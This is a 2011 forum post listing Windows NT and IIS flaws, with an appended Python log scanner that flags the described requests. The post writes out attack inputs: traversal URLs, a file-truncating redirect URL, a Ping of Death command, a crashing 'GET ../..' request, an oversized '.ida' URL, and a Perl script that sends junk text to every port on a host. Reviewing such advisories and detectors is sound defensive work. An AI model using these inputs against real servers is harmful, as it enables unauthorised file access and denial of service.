Title: NT vulnerabilities and descriptions (English)
Author: 雜七雜八   Time: 2011-1-13 17:12

Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------

Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.
----------------------------------------------------------------------

Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

  Telnet to an NT 4.0 system on port 135
  Type about 10 characters followed by a <CR>
  Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):

/*begin poke code*/
use Socket;
use FileHandle;
require "chat2.pl";          # supplies chat::open_port, chat::print and chat::close

$systemname = shift @ARGV;   # host to test, taken from the command line
die "usage: perl poke servername\n" unless defined $systemname;

$verbose = 1;                # tell me what you're hitting
$knownports = 1;             # don't hit known problem ports (53, 135, 1031)

for ($port = 1; $port < 65535; $port++)   # the posted text read "$port = $0"; port 0 is not a valid destination
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless defined $fh;   # nothing answered on this port, move on
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: 4.0

Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
--------------------------------------------------------------------------------

Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL:

http://www.example.com/...[25kb of '.']...ida

the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as:

http://www.microsoft.com/anything.ida

or:

http://www.microsoft.com/anything.idq

a remote user will get a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
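From the defender's side, the request shapes this list describes (the '..\..' traversal URLs at the top of the post, the oversized request ending in "ida", and the probes for non-existent .ida/.idq files just above) all leave a recognisable trace in the web server's access log. The Python below scans such log lines for them. It is example code written for this edit, not code from the original post or from Microsoft; the log layout (date, time, client IP, method, URI stem, status), the sample entries and the 1024-byte length threshold are all assumptions made for the example.

```python
"""Flag IIS-style access log lines that match the request patterns described in the post."""
import re
from urllib.parse import unquote

# Constructed sample log lines (assumed layout: date time client-ip method uri-stem status).
# These entries are made up for the example; they are not logs from any real server.
LONG_DOTS = "." * 3000            # stands in for the post's "[25kb of '.']" request
SAMPLE_LOG = f"""\
2011-01-13 17:12:01 10.0.0.5 GET /default.htm 200
2011-01-13 17:12:02 10.0.0.9 GET /..\\..\\autoexec.bat 200
2011-01-13 17:12:03 10.0.0.9 GET /scripts..\\..\\test.bat 200
2011-01-13 17:12:04 10.0.0.9 GET /%2e%2e/%2e%2e/boot.ini 404
2011-01-13 17:12:05 10.0.0.9 GET /anything.idq 404
2011-01-13 17:12:06 10.0.0.9 GET /{LONG_DOTS}ida 500
2011-01-13 17:12:07 10.0.0.5 GET /images/logo.gif 200
"""

# ".." followed by either separator style; checked after percent-decoding so %2e%2e is caught too.
DOTDOT = re.compile(r"\.\.[\\/]")
# Requests for .ida / .idq files (the path-disclosure probe when the file does not exist).
IDA_IDQ = re.compile(r"\.(?:ida|idq)$", re.IGNORECASE)
# Assumed threshold: a legitimate uri-stem on this kind of site is far shorter than this.
MAX_URI_LEN = 1024


def classify_request(uri_stem, status):
    """Return a list of labels for one request; an empty list means nothing suspicious."""
    decoded = unquote(uri_stem)
    labels = []
    if DOTDOT.search(decoded):
        labels.append("path-traversal")
    if len(decoded) > MAX_URI_LEN:
        labels.append("oversized-uri")
    # Only a 404 for an .ida/.idq file is the disclosure probe; a served file is normal use.
    if IDA_IDQ.search(decoded) and status == 404:
        labels.append("idq-path-disclosure-probe")
    return labels


def scan_log(text):
    """Parse each line and return (line_no, client_ip, uri_stem, labels) for flagged requests."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) != 6:
            continue                      # skip lines that do not fit the assumed layout
        _date, _time, client, _method, uri, status = fields
        labels = classify_request(uri, int(status))
        if labels:
            hits.append((n, client, uri, labels))
    return hits


def hits_by_client(hits):
    """Count flagged requests per client IP, so a single probing host stands out."""
    counts = {}
    for _n, client, _uri, _labels in hits:
        counts[client] = counts.get(client, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for n, client, uri, labels in found:
        shown = uri if len(uri) <= 60 else uri[:57] + "..."
        print(f"line {n}: {client} {shown} -> {', '.join(labels)}")
    print("per client:", hits_by_client(found))
```

The decode-then-match order matters: the traversal check runs on the percent-decoded path, so the encoded form on the fourth sample line is flagged along with the literal ones, and the `scripts..\..` form (no separator before the dots) is caught because the pattern only requires a separator after them.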